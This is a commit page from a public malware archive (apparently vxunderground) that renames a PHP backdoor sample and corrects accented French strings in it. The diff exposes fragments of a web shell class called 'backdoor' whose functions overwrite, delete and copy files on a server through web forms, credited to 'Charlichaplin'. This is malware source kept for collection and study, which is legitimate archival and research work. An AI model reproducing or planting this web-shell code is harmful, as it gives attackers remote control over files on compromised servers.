Skip to content
Snippets Groups Projects
Unverified Commit 3b4ba148 authored by vxunderground's avatar vxunderground Committed by GitHub
Browse files

Rename Backdoor.PHP.Agent.ap to Backdoor.PHP.CharliChaplin.a

parent 0e7bd934
No related branches found
No related tags found
No related merge requests found
......@@ -52,7 +52,7 @@ class backdoor {
$fp = fopen($this->edit,"w+");
fwrite($fp, $this->fichier);
fclose($fp);
echo "Le fichier a t modifi";
echo "Le fichier a été modifié";
}
}
......@@ -60,7 +60,7 @@ class backdoor {
function del() {
if(is_file($this->del)) {
if(unlink($this->del)) {
echo "Fichier supprim";
echo "Fichier supprimé";
} else {
echo "Vous n'avez pas les droits pour supprimer ce fichier";
}
......@@ -95,7 +95,7 @@ class backdoor {
function ccopy($cfichier,$cdestination) {
if(!empty($cfichier) && !empty($cdestination)) {
copy($cfichier, $cdestination);
echo "Le fichier a t copi";
echo "Le fichier a été copié";
} else {
echo "<form method=\"POST\" action=\"".$_SERVER['PHP_SELF']."?copy=1\">Source: <input type=\"text\" name=\"cfichier\"><br>Destination: <input type=\"text\" name=\"cdestination\"><input type=\"submit\" title=\"Submit\"></form>";
}
......@@ -178,4 +178,4 @@ if($file) {
}
echo "</PRE><HR noshade align=\"left\" width=\"80%\">";
echo "<center><b>Coded By Charlichaplin</b></center>";
echo "</BODY></HTML>";
\ No newline at end of file
echo "</BODY></HTML>";
0% Loading or .
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment